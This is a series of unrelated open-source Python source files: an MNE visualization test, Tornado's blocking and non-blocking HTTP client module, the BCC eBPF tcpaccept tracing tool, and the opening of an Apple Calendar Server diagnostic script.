rend.text3d(x=0, y=0, z=0, text=txt_text, scale=1.0)
rend.set_camera(azimuth=180.0, elevation=90.0,
distance=cam_distance,
focalpoint=center)
rend.reset_camera()
rend.show()
def test_get_3d_backend(renderer):
"""Test get_3d_backend function call for side-effects."""
# Test twice to ensure the first call had no side-effect
orig_backend = renderer.MNE_3D_BACKEND
assert renderer.get_3d_backend() == orig_backend
assert renderer.get_3d_backend() == orig_backend
def test_renderer(renderer, monkeypatch):
"""Test that renderers are available on demand."""
backend = renderer.get_3d_backend()
cmd = [sys.executable, '-uc',
'import mne; mne.viz.create_3d_figure((800, 600)); '
'backend = mne.viz.get_3d_backend(); '
'assert backend == %r, backend' % (backend,)]
monkeypatch.setenv('MNE_3D_BACKEND', backend)
run_subprocess(cmd)
def test_set_3d_backend_bad(monkeypatch, tmpdir):
"""Test that the error emitted when a bad backend name is used."""
match = "Allowed values are 'pyvistaqt', 'mayavi', and 'notebook'"
with pytest.raises(ValueError, match=match):
set_3d_backend('invalid')
# gh-9607
def fail(x):
raise ModuleNotFoundError(x)
monkeypatch.setattr('mne.viz.backends.renderer._reload_backend', fail)
monkeypatch.setattr(
'mne.viz.backends.renderer.MNE_3D_BACKEND', None)
# avoid using the config
monkeypatch.setenv('_MNE_FAKE_HOME_DIR', str(tmpdir))
match = 'Could not load any valid 3D.*\npyvistaqt: .*'
assert get_3d_backend() is None
with pytest.raises(RuntimeError, match=match):
_get_renderer()
|
|
"""Blocking and non-blocking HTTP client interfaces.
This module defines a common interface shared by two implementations,
``simple_httpclient`` and ``curl_httpclient``. Applications may either
instantiate their chosen implementation class directly or use the
`AsyncHTTPClient` class from this module, which selects an implementation
that can be overridden with the `AsyncHTTPClient.configure` method.
The default implementation is ``simple_httpclient``, and this is expected
to be suitable for most users' needs. However, some applications may wish
to switch to ``curl_httpclient`` for reasons such as the following:
* ``curl_httpclient`` has some features not found in ``simple_httpclient``,
including support for HTTP proxies and the ability to use a specified
network interface.
* ``curl_httpclient`` is more likely to be compatible with sites that are
not-quite-compliant with the HTTP spec, or sites that use little-exercised
features of HTTP.
* ``curl_httpclient`` is faster.
* ``curl_httpclient`` was the default prior to Tornado 2.0.
Note that if you are using ``curl_httpclient``, it is highly
recommended that you use a recent version of ``libcurl`` and
``pycurl``. Currently the minimum supported version of libcurl is
7.21.1, and the minimum version of pycurl is 7.18.2. It is highly
recommended that your ``libcurl`` installation is built with
asynchronous DNS resolver (threaded or c-ares), otherwise you may
encounter various problems with request timeouts (for more
information, see
http://curl.haxx.se/libcurl/c/curl_easy_setopt.html#CURLOPTCONNECTTIMEOUTMS
and comments in curl_httpclient.py).
To select ``curl_httpclient``, call `AsyncHTTPClient.configure` at startup::
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
"""
from __future__ import absolute_import, division, print_function, with_statement
import functools
import time
import weakref
from tornado.concurrent import TracebackFuture
from tornado.escape import utf8, native_str
from tornado import httputil, stack_context
from tornado.ioloop import IOLoop
from tornado.util import Configurable
class HTTPClient(object):
"""A blocking HTTP client.
This interface is provided for convenience and testing; most applications
that are running an IOLoop will want to use `AsyncHTTPClient` instead.
Typical usage looks like this::
http_client = httpclient.HTTPClient()
try:
response = http_client.fetch("http://www.google.com/")
print response.body
except httpclient.HTTPError as e:
# HTTPError is raised for non-200 responses; the response
# can be found in e.response.
print("Error: " + str(e))
except Exception as e:
# Other errors are possible, such as IOError.
print("Error: " + str(e))
http_client.close()
"""
def __init__(self, async_client_class=None, **kwargs):
self._io_loop = IOLoop(make_current=False)
if async_client_class is None:
async_client_class = AsyncHTTPClient
self._async_client = async_client_class(self._io_loop, **kwargs)
self._closed = False
def __del__(self):
self.close()
def close(self):
"""Closes the HTTPClient, freeing any resources used."""
if not self._closed:
self._async_client.close()
self._io_loop.close()
self._closed = True
def fetch(self, request, **kwargs):
"""Executes a request, returning an `HTTPResponse`.
The request may be either a string URL or an `HTTPRequest` object.
If it is a string, we construct an `HTTPRequest` using any additional
kwargs: ``HTTPRequest(request, **kwargs)``
If an error occurs during the fetch, we raise an `HTTPError` unless
the ``raise_error`` keyword argument is set to False.
"""
response = self._io_loop.run_sync(functools.partial(
self._async_client.fetch, request, **kwargs))
return response
class AsyncHTTPClient(Configurable):
"""An non-blocking HTTP client.
Example usage::
def handle_request(response):
if response.error:
print "Error:", response.error
else:
print response.body
http_client = AsyncHTTPClient()
http_client.fetch("http://www.google.com/", handle_request)
The constructor for this class is magic in several respects: It
actually creates an instance of an implementation-specific
subclass, and instances are reused as a kind of pseudo-singleton
(one per `.IOLoop`). The keyword argument ``force_instance=True``
can be used to suppress this singleton behavior. Unless
``force_instance=True`` is used, no arguments other than
``io_loop`` should be passed to the `AsyncHTTPClient` constructor.
The implementation subclass as well as arguments to its
constructor can be set with the static method `configure()`
All `AsyncHTTPClient` implementations support a ``defaults``
keyword argument, which can be used to set default values for
`HTTPRequest` attributes. For example::
AsyncHTTPClient.configure(
None, defaults=dict(user_agent="MyUserAgent"))
# or with force_instance:
client = AsyncHTTPClient(force_instance=True,
defaults=dict(user_agent="MyUserAgent"))
.. versionchanged:: 4.1
The ``io_loop`` argument is deprecated.
"""
@classmethod
def configurable_base(cls):
return AsyncHTTPClient
@classmethod
def configurable_default(cls):
from tornado.simple_httpclient import SimpleAsyncHTTPClient
return SimpleAsyncHTTPClient
@classmethod
def _async_clients(cls):
attr_name = '_async_client_dict_' + cls.__name__
if not hasattr(cls, attr_name):
setattr(cls, attr_name, weakref.WeakKeyDictionary())
return getattr(cls, attr_name)
def __new__(cls, io_loop=None, force_instance=False, **kwargs):
io_loop = io_loop or IOLoop.current()
if force_instance:
instance_cache = None
else:
instance_cache = cls._async_clients()
if instance_cache is not None and io_loop in instance_cache:
return instance_cache[io_loop]
instance = super(AsyncHTTPClient, cls).__new__(cls, io_loop=io_loop,
**kwargs)
# Make sure the instance knows which cache to remove itself from.
# It can't simply call _async_clients() because we may be in
# __new__(AsyncHTTPClient) but instance.__class__ may be
# SimpleAsyncHTTPClient.
instance._instance_cache = instance_cache
if instance_cache is not None:
instance_cache[instance.io_loop] = instance
return instance
def initialize(self, io_loop, defaults=None):
self.io_loop = io_loop
self.defaults = dict(HTTPRequest._DEFAULTS)
if defaults is not None:
self.defaults.update(defaults)
self._closed = False
def close(self):
"""Destroys this HTTP client, freeing any file descriptors used.
This method is **not needed in normal use** due to the way
that `AsyncHTTPClient` objects are transparently reused.
``close()`` is generally only necessary when either the
`.IOLoop` is also being closed, or the ``force_instance=True``
argument was used when creating the `AsyncHTTPClient`.
No other methods may be called on the `AsyncHTTPClient` after
``close()``.
"""
if self._closed:
return
self._closed = True
if self._instance_cache is not None:
if self._instance_cache.get(self.io_loop) is not self:
raise RuntimeError("inconsistent AsyncHTTPClient cache")
del self._instance_cache[self.io_loop]
def fetch(self, request, callback=None, raise_error=True, **kwargs):
"""Executes a request, asynchronously returning an `HTTPResponse`.
The request may be either a string URL or an `HTTPRequest` object.
If it is a string, we construct an `HTTPRequest` using any additional
kwargs: ``HTTPRequest(request, **kwargs)``
This method returns a `.Future` whose result is an
`HTTPResponse`. By default, the ``Future`` will raise an
`HTTPError` if the request returned a non-200 response code
(other errors may also be raised if the server could not be
contacted). Instead, if ``raise_error`` is set to False, the
response will always be returned regardless of the response
code.
If a ``callback`` is given, it will be invoked with the `HTTPResponse`.
In the callback interface, `HTTPError` is not automatically raised.
Instead, you must check the response's ``error`` attribute or
call its `~HTTPResponse.rethrow` method.
"""
if self._closed:
raise RuntimeError("fetch() called on closed AsyncHTTPClient")
if not isinstance(request, HTTPRequest):
request = HTTPRequest(url=request, **kwargs)
# We may modify this (to add Host, Accept-Encoding, etc),
# so make sure we don't modify the caller's object. This is also
# where normal dicts get converted to HTTPHeaders objects.
request.headers = httputil.HTTPHeaders(request.headers)
request = _RequestProxy(request, self.defaults)
future = TracebackFuture()
if callback is not None:
callback = stack_context.wrap(callback)
def handle_future(future):
exc = future.exception()
if isinstance(exc, HTTPError) and exc.response is not None:
response = exc.response
elif exc is not None:
response = HTTPResponse(
request, 599, error=exc,
request_time=time.time() - request.start_time)
else:
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
def handle_response(response):
if raise_error and response.error:
future.set_exception(response.error)
else:
future.set_result(response)
self.fetch_impl(request, handle_response)
return future
def fetch_impl(self, request, callback):
raise NotImplementedError()
@classmethod
def configure(cls, impl, **kwargs):
"""Configures the `AsyncHTTPClient` subclass to use.
``AsyncHTTPClient()`` actually creates an instance of a subclass.
This method may be called with either a class object or the
fully-qualified name of such a class (or ``None`` to use the default,
``SimpleAsyncHTTPClient``)
If additional keyword arguments are given, they will be passed
to the constructor of each subclass instance created. The
keyword argument ``max_clients`` determines the maximum number
of simultaneous `~AsyncHTTPClient.fetch()` operations that can
execute in parallel on each `.IOLoop`. Additional arguments
may be supported depending on the implementation class in use.
Example::
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
"""
super(AsyncHTTPClient, cls).configure(impl, **kwargs)
class HTTPRequest(object):
"""HTTP client request object."""
# Default values for HTTPRequest parameters.
# Merged with the values on the request object by AsyncHTTPClient
# implementations.
_DEFAULTS = dict(
connect_timeout=20.0,
request_timeout=20.0,
follow_redirects=True,
max_redirects=5,
decompress_response=True,
proxy_password='',
allow_nonstandard_methods=False,
validate_cert=True)
def __init__(self, url, method="GET", headers=None, body=None,
auth_username=None, auth_password=None, auth_mode=None,
connect_timeout=None, request_timeout=None,
if_modified_since=None, follow_redirects=None,
max_redirects=None, user_agent=None, use_gzip=None,
network_interface=None, streaming_callback=None,
header_callback=None, prepare_curl_callback=None,
proxy_host=None, proxy_port=None, proxy_username=None,
proxy_password=None, allow_nonstandard_methods=None,
validate_cert=None, ca_certs=None,
allow_ipv6=None,
client_key=None, client_cert=None, body_producer=None,
expect_100_continue=False, decompress_response=None,
ssl_options=None):
r"""All parameters except ``url`` are optional.
:arg string url: URL to fetch
:arg string method: HTTP method, e.g. "GET" or "POST"
:arg headers: Additional HTTP headers to pass on the request
:type headers: `~tornado.httputil.HTTPHeaders` or `dict`
:arg body: HTTP request body as a string (byte or unicode; if unicode
the utf-8 encoding will be used)
:arg body_producer: Callable used for lazy/asynchronous request bodies.
It is called with one argument, a ``write`` function, and should
return a `.Future`. It should call the write function with new
data as it becomes available. The write function returns a
`.Future` which can be used for flow control.
Only one of ``body`` and ``body_producer`` may
be specified. ``body_producer`` is not supported on
``curl_httpclient``. When using ``body_producer`` it is recommended
to pass a ``Content-Length`` in the headers as otherwise chunked
encoding will be used, and many servers do not support chunked
encoding on requests. New in Tornado 4.0
:arg string auth_username: Username for HTTP authentication
:arg string auth_password: Password for HTTP authentication
:arg string auth_mode: Authentication mode; default is "basic".
Allowed values are implementation-defined; ``curl_httpclient``
supports "basic" and "digest"; ``simple_httpclient`` only supports
"basic"
:arg float connect_timeout: Timeout for initial connection in seconds
:arg float request_timeout: Timeout for entire request in seconds
:arg if_modified_since: Timestamp for ``If-Modified-Since`` header
:type if_modified_since: `datetime` or `float`
:arg bool follow_redirects: Should redirects be followed automatically
or return the 3xx response?
:arg int max_redirects: Limit for ``follow_redirects``
:arg string user_agent: String to send as ``User-Agent`` header
:arg bool decompress_response: Request a compressed response from
the server and decompress it after downloading. Default is True.
New in Tornado 4.0.
:arg bool use_gzip: Deprecated alias for ``decompress_response``
since Tornado 4.0.
:arg string network_interface: Network interface to use for request.
``curl_httpclient`` only; see note below.
:arg callable streaming_callback: If set, ``streaming_callback`` will
be run with each chunk of data as it is received, and
``HTTPResponse.body`` and ``HTTPResponse.buffer`` will be empty in
the final response.
:arg callable header_callback: If set, ``header_callback`` will
be run with each header line as it is received (including the
first line, e.g. ``HTTP/1.0 200 OK\r\n``, and a final line
containing only ``\r\n``. All lines include the trailing newline
characters). ``HTTPResponse.headers`` will be empty in the final
response. This is most useful in conjunction with
``streaming_callback``, because it's the only way to get access to
header data while the request is in progress.
:arg callable prepare_curl_callback: If set, will be called with
a ``pycurl.Curl`` object to allow the application to make additional
``setopt`` calls.
:arg string proxy_host: HTTP proxy hostname. To use proxies,
``proxy_host`` and ``proxy_port`` must be set; ``proxy_username`` and
``proxy_pass`` are optional. Proxies are currently only supported
with ``curl_httpclient``.
:arg int proxy_port: HTTP proxy port
:arg string proxy_username: HTTP proxy username
:arg string proxy_password: HTTP proxy password
:arg bool allow_nonstandard_methods: Allow unknown values for ``method``
argument?
:arg bool validate_cert: For HTTPS requests, validate the server's
certificate?
:arg string ca_certs: filename of CA certificates in PEM format,
or None to use defaults. See note below when used with
``curl_httpclient``.
:arg string client_key: Filename for client SSL key, if any. See
note below when used with ``curl_httpclient``.
:arg string client_cert: Filename for client SSL certificate, if any.
See note below when used with ``curl_httpclient``.
:arg ssl.SSLContext ssl_options: `ssl.SSLContext` object for use in
``simple_httpclient`` (unsupported by ``curl_httpclient``).
Overrides ``validate_cert``, ``ca_certs``, ``client_key``,
and ``client_cert``.
:arg bool allow_ipv6: Use IPv6 when available? Default is true.
:arg bool expect_100_continue: If true, send the
``Expect: 100-continue`` header and wait for a continue response
before sending the request body. Only supported with
simple_httpclient.
.. note::
When using ``curl_httpclient`` certain options may be
inherited by subsequent fetches because ``pycurl`` does
not allow them to be cleanly reset. This applies to the
``ca_certs``, ``client_key``, ``client_cert``, and
``network_interface`` arguments. If you use these
options, you should pass them on every request (you don't
have to always use the same values, but it's not possible
to mix requests that specify these options with ones that
use the defaults).
.. versionadded:: 3.1
The ``auth_mode`` argument.
.. versionadded:: 4.0
The ``body_producer`` and ``expect_100_continue`` arguments.
.. versionadded:: 4.2
The ``ssl_options`` argument.
"""
# Note that some of these attributes go through property setters
# defined below.
self.headers = headers
if if_modified_since:
self.headers["If-Modified-Since"] = httputil.format_timestamp(
if_modified_since)
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_username = proxy_username
self.proxy_password = proxy_password
self.url = url
self.method = method
self.body = body
self.body_producer = body_producer
self.auth_username = auth_username
self.auth_password = auth_password
self.auth_mode = auth_mode
self.connect_timeout = connect_timeout
self.request_timeout = request_timeout
self.follow_redirects = follow_redirects
self.max_redirects = max_redirects
self.user_agent = user_agent
if decompress_response is not None:
self.decompress_response = decompress_response
else:
self.decompress_response = use_gzip
self.network_interface = network_interface
self.streaming_callback = streaming_callback
self.header_callback = header_callback
self.prepare_curl_callback = prepare_curl_callback
self.allow_nonstandard_methods = allow_nonstandard_methods
self.validate_cert = validate_cert
self.ca_certs = ca_certs
self.allow_ipv6 = allow_ipv6
self.client_key = client_key
self.client_cert = client_cert
self.ssl_options = ssl_options
self.expect_100_continue = expect_100_continue
self.start_time = time.time()
@property
def headers(self):
return self._headers
@headers.setter
def headers(self, value):
if value is None:
self._headers = httputil.HTTPHeaders()
else:
self._headers = value
@property
def body(self):
return self._body
@body.setter
def body(self, value):
self._body = utf8(value)
@property
def body_producer(self):
return self._body_producer
@body_producer.setter
def body_producer(self, value):
self._body_producer = stack_context.wrap(value)
@property
def streaming_callback(self):
return self._streaming_callback
@streaming_callback.setter
def streaming_callback(self, value):
self._streaming_callback = stack_context.wrap(value)
@property
def header_callback(self):
return self._header_callback
@header_callback.setter
def header_callback(self, value):
self._header_callback = stack_context.wrap(value)
@property
def prepare_curl_callback(self):
return self._prepare_curl_callback
@prepare_curl_callback.setter
def prepare_curl_callback(self, value):
self._prepare_curl_callback = stack_context.wrap(value)
class HTTPResponse(object):
"""HTTP Response object.
Attributes:
* request: HTTPRequest object
* code: numeric HTTP status code, e.g. 200 or 404
* reason: human-readable reason phrase describing the status code
* headers: `tornado.httputil.HTTPHeaders` object
* effective_url: final location of the resource after following any
redirects
* buffer: ``cStringIO`` object for response body
* body: response body as string (created on demand from ``self.buffer``)
* error: Exception object, if any
* request_time: seconds from request start to finish
* time_info: dictionary of diagnostic timing information from the request.
Available data are subject to change, but currently uses timings
available from http://curl.haxx.se/libcurl/c/curl_easy_getinfo.html,
plus ``queue``, which is the delay (if any) introduced by waiting for
a slot under `AsyncHTTPClient`'s ``max_clients`` setting.
"""
def __init__(self, request, code, headers=None, buffer=None,
effective_url=None, error=None, request_time=None,
time_info=None, reason=None):
if isinstance(request, _RequestProxy):
self.request = request.request
else:
self.request = request
self.code = code
self.reason = reason or httputil.responses.get(code, "Unknown")
if headers is not None:
self.headers = headers
else:
self.headers = httputil.HTTPHeaders()
self.buffer = buffer
self._body = None
if effective_url is None:
self.effective_url = request.url
else:
self.effective_url = effective_url
if error is None:
if self.code < 200 or self.code >= 300:
self.error = HTTPError(self.code, message=self.reason,
response=self)
else:
self.error = None
else:
self.error = error
self.request_time = request_time
self.time_info = time_info or {}
def _get_body(self):
if self.buffer is None:
return None
elif self._body is None:
self._body = self.buffer.getvalue()
return self._body
body = property(_get_body)
def rethrow(self):
"""If there was an error on the request, raise an `HTTPError`."""
if self.error:
raise self.error
def __repr__(self):
args = ",".join("%s=%r" % i for i in sorted(self.__dict__.items()))
return "%s(%s)" % (self.__class__.__name__, args)
class HTTPError(Exception):
"""Exception thrown for an unsuccessful HTTP request.
Attributes:
* ``code`` - HTTP error integer error code, e.g. 404. Error code 599 is
used when no HTTP response was received, e.g. for a timeout.
* ``response`` - `HTTPResponse` object, if any.
Note that if ``follow_redirects`` is False, redirects become HTTPErrors,
and you can look at ``error.response.headers['Location']`` to see the
destination of the redirect.
"""
def __init__(self, code, message=None, response=None):
self.code = code
self.message = message or httputil.responses.get(code, "Unknown")
self.response = response
super(HTTPError, self).__init__(code, message, response)
def __str__(self):
return "HTTP %d: %s" % (self.code, self.message)
class _RequestProxy(object):
"""Combines an object with a dictionary of defaults.
Used internally by AsyncHTTPClient implementations.
"""
def __init__(self, request, defaults):
self.request = request
self.defaults = defaults
def __getattr__(self, name):
request_attr = getattr(self.request, name)
if request_attr is not None:
return request_attr
elif self.defaults is not None:
return self.defaults.get(name, None)
else:
return None
def main():
from tornado.options import define, options, parse_command_line
define("print_headers", type=bool, default=False)
define("print_body", type=bool, default=True)
define("follow_redirects", type=bool, default=True)
define("validate_cert", type=bool, default=True)
args = parse_command_line()
client = HTTPClient()
for arg in args:
try:
response = client.fetch(arg,
follow_redirects=options.follow_redirects,
validate_cert=options.validate_cert,
)
except HTTPError as e:
if e.response is not None:
response = e.response
else:
raise
if options.print_headers:
print(response.headers)
if options.print_body:
print(native_str(response.body))
client.close()
if __name__ == "__main__":
main()
|
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# tcpaccept Trace TCP accept()s.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcpaccept [-h] [-T] [-t] [-p PID] [-P PORTS]
#
# This uses dynamic tracing of the kernel inet_csk_accept() socket function
# (from tcp_prot.accept), and will need to be modified to match kernel changes.
#
# Copyright (c) 2015 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 13-Oct-2015 Brendan Gregg Created this.
# 14-Feb-2016 " " Switch to bpf_perf_output.
from __future__ import print_function
from bcc.containers import filter_by_containers
from bcc import BPF
from socket import inet_ntop, AF_INET, AF_INET6
from struct import pack
import argparse
from bcc.utils import printb
from time import strftime
# arguments
examples = """examples:
./tcpaccept # trace all TCP accept()s
./tcpaccept -t # include timestamps
./tcpaccept -P 80,81 # only trace port 80 and 81
./tcpaccept -p 181 # only trace PID 181
./tcpaccept --cgroupmap mappath # only trace cgroups in this BPF map
./tcpaccept --mntnsmap mappath # only trace mount namespaces in the map
"""
parser = argparse.ArgumentParser(
description="Trace TCP accepts",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-T", "--time", action="store_true",
help="include time column on output (HH:MM:SS)")
parser.add_argument("-t", "--timestamp", action="store_true",
help="include timestamp on output")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("-P", "--port",
help="comma-separated list of local ports to trace")
parser.add_argument("--cgroupmap",
help="trace cgroups in this BPF map only")
parser.add_argument("--mntnsmap",
help="trace mount namespaces in this BPF map only")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
// separate data structs for ipv4 and ipv6
struct ipv4_data_t {
u64 ts_us;
u32 pid;
u32 saddr;
u32 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv4_events);
struct ipv6_data_t {
u64 ts_us;
u32 pid;
unsigned __int128 saddr;
unsigned __int128 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv6_events);
"""
#
# The following code uses kprobes to instrument inet_csk_accept().
# On Linux 4.16 and later, we could use sock:inet_sock_set_state
# tracepoint for efficiency, but it may output wrong PIDs. This is
# because sock:inet_sock_set_state may run outside of process context.
# Hence, we stick to kprobes until we find a proper solution.
#
bpf_text_kprobe = """
int kretprobe__inet_csk_accept(struct pt_regs *ctx)
{
if (container_should_be_filtered()) {
return 0;
}
struct sock *newsk = (struct sock *)PT_REGS_RC(ctx);
u32 pid = bpf_get_current_pid_tgid() >> 32;
##FILTER_PID##
if (newsk == NULL)
return 0;
// check this is TCP
u8 protocol = 0;
// workaround for reading the sk_protocol bitfield:
// Following comments add by Joe Yin:
// Unfortunately,it can not work since Linux 4.10,
// because the sk_wmem_queued is not following the bitfield of sk_protocol.
// And the following member is sk_gso_max_segs.
// So, we can use this:
// bpf_probe_read_kernel(&protocol, 1, (void *)((u64)&newsk->sk_gso_max_segs) - 3);
// In order to diff the pre-4.10 and 4.10+ ,introduce the variables gso_max_segs_offset,sk_lingertime,
// sk_lingertime is closed to the gso_max_segs_offset,and
// the offset between the two members is 4
int gso_max_segs_offset = offsetof(struct sock, sk_gso_max_segs);
int sk_lingertime_offset = offsetof(struct sock, sk_lingertime);
if (sk_lingertime_offset - gso_max_segs_offset == 4)
// 4.10+ with little endian
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 3);
else
// pre-4.10 with little endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 3);
#elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__
// 4.10+ with big endian
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 1);
else
// pre-4.10 with big endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 1);
#else
# error "Fix your compiler's __BYTE_ORDER__?!"
#endif
if (protocol != IPPROTO_TCP)
return 0;
// pull in details
u16 family = 0, lport = 0, dport;
family = newsk->__sk_common.skc_family;
lport = newsk->__sk_common.skc_num;
dport = newsk->__sk_common.skc_dport;
dport = ntohs(dport);
##FILTER_PORT##
if (family == AF_INET) {
struct ipv4_data_t data4 = {.pid = pid, .ip = 4};
data4.ts_us = bpf_ktime_get_ns() / 1000;
data4.saddr = newsk->__sk_common.skc_rcv_saddr;
data4.daddr = newsk->__sk_common.skc_daddr;
data4.lport = lport;
data4.dport = dport;
bpf_get_current_comm(&data4.task, sizeof(data4.task));
ipv4_events.perf_submit(ctx, &data4, sizeof(data4));
} else if (family == AF_INET6) {
struct ipv6_data_t data6 = {.pid = pid, .ip = 6};
data6.ts_us = bpf_ktime_get_ns() / 1000;
bpf_probe_read_kernel(&data6.saddr, sizeof(data6.saddr),
&newsk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read_kernel(&data6.daddr, sizeof(data6.daddr),
&newsk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
data6.lport = lport;
data6.dport = dport;
bpf_get_current_comm(&data6.task, sizeof(data6.task));
ipv6_events.perf_submit(ctx, &data6, sizeof(data6));
}
// else drop
return 0;
}
"""
bpf_text += bpf_text_kprobe
# code substitutions
if args.pid:
bpf_text = bpf_text.replace('##FILTER_PID##',
'if (pid != %s) { return 0; }' % args.pid)
else:
bpf_text = bpf_text.replace('##FILTER_PID##', '')
if args.port:
lports = [int(lport) for lport in args.port.split(',')]
lports_if = ' && '.join(['lport != %d' % lport for lport in lports])
bpf_text = bpf_text.replace('##FILTER_PORT##',
'if (%s) { return 0; }' % lports_if)
bpf_text = filter_by_containers(args) + bpf_text
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
bpf_text = bpf_text.replace('##FILTER_PORT##', '')
# process event
def print_ipv4_event(cpu, data, size):
event = b["ipv4_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET, pack("I", event.daddr)).encode(),
event.dport,
inet_ntop(AF_INET, pack("I", event.saddr)).encode(),
event.lport))
def print_ipv6_event(cpu, data, size):
event = b["ipv6_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET6, event.daddr).encode(),
event.dport,
inet_ntop(AF_INET6, event.saddr).encode(),
event.lport))
# initialize BPF
b = BPF(text=bpf_text)
# header
if args.time:
print("%-9s" % ("TIME"), end="")
if args.timestamp:
print("%-9s" % ("TIME(s)"), end="")
print("%-7s %-12s %-2s %-16s %-5s %-16s %-5s" % ("PID", "COMM", "IP", "RADDR",
"RPORT", "LADDR", "LPORT"))
start_ts = 0
# read events
b["ipv4_events"].open_perf_buffer(print_ipv4_event)
b["ipv6_events"].open_perf_buffer(print_ipv6_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
|
#!/usr/bin/env python
##
# Copyright (c) 2014-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from __future__ import print_function
import sys
from getopt import getopt, GetoptError
import os
from plistlib import readPlist, readPlistFromString
import re
import subprocess
import urllib2
PREFS_PLIST = "/Library/Server/Preferences/Calendar.plist"
ServerHostName = ""
class FileNotFound(Exception):
"""
Missing file exception
"""
def usage(e=None):
if e:
print(e)
print("")
name = os.path.basename(sys.argv[0])
print("usage: {} [options]".format(name))
print("options:")
print(" -h --help: print this help and exit")
if e:
sys.exit(64)
else:
sys.exit(0)
def main():
if os.getuid() != 0:
usage("This program must be run as root")
try:
optargs, _ignore_args = getopt(
sys.argv[1:], "h", [
"help",
"phantom",
],
)
except GetoptError, e:
usage(e)
for opt, arg in optargs:
# Args come in as encoded bytes
arg = arg.decode("utf-8")
if opt in ("-h", "--help"):
usage()
elif opt == "--phantom":
result = detectPhantomVolume()
sys.exit(result)
osBuild = getOSBuild()
print("OS Build: {}".format(osBuild))
serverBuild = getServerBuild()
print("Server Build: {}".format(serverBuild))
print()
try:
if checkPlist(PREFS_PLIST):
print("{} exists and can be parsed".format(PREFS_PLIST))
else:
print("{} exists but cannot be parsed".format(PREFS_PLIST))
except FileNotFound:
print("{} does not exist (but that's ok)".format(PREFS_PLIST))
serverRoot = getServerRoot()
print("Prefs plist says ServerRoot directory is: {}".format(serverRoot.encode("utf-8")))
result = detectPhantomVolume(serverRoot)
if result == EXIT_CODE_OK:
print("ServerRoot volume ok")
elif result == EXIT_CODE_SERVER_ROOT_MISSING:
print("ServerRoot directory missing")
elif result == EXIT_CODE_PHANTOM_DATA_VOLUME:
print("Phantom ServerRoot volume detected")
systemPlist = os.path.join(serverRoot, "Config", "caldavd-system.plist")
try:
if checkPlist(systemPlist):
print("{} exists and can be parsed".format(systemPlist.encode("utf-8")))
else:
print("{} exists but cannot be parsed".format(systemPlist.encode("utf-8")))
except FileNotFound:
print("{} does not exist".format(systemPlist.encode("utf-8")))
userPlist = os.path.join(serverRoot, "Config", "caldavd-user.plist")
try:
if checkPlist(userPlist):
print("{} exists and can be parsed".format(userPlist.encode("utf-8")))
else:
print("{} exists but cannot be parsed".format(userPlist.encode("utf-8")))
except FileNotFound:
print("{} does not exist".format(userPlist.encode("utf-8")))
keys = showConfigKeys()
showProcesses()
showServerctlStatus()
showDiskSpace(serverRoot)
postgresRunning = showPostgresStatus(serverRoot)
if postgresRunning:
showPostgresContent()
password = getPasswordFromKeychain("com.apple.calendarserver")
connectToAgent(password)
connectToCaldavd(keys)
showWebApps()
EXIT_CODE_OK = 0
EXIT_CODE_SERVER_ROOT_MISSING = 1
EXIT_CODE_PHANTOM_DATA_VOLUME = 2
def detectPhantomVolume(serverRoot=None):
"""
Check to see if serverRoot directory exists in a "phantom" volume, meaning
it's simply a directory under /Volumes residing on the boot volume, rather
that a real separate volume.
"""
if not serverRoot:
serverRoot = getServerRoot()
if not os.path.exists(serverRoot):
return EXIT_CODE_SERVER_ROOT_MISSING
if serverRoot.startswith("/Volumes/"):
bootDevice = os.stat("/").st_dev
dataDevice = os.stat(serverRoot).st_dev
if bootDevice == dataDevice:
return EXIT_CODE_PHANTOM_DATA_VOLUME
return EXIT_CODE_OK
def showProcesses():
print()
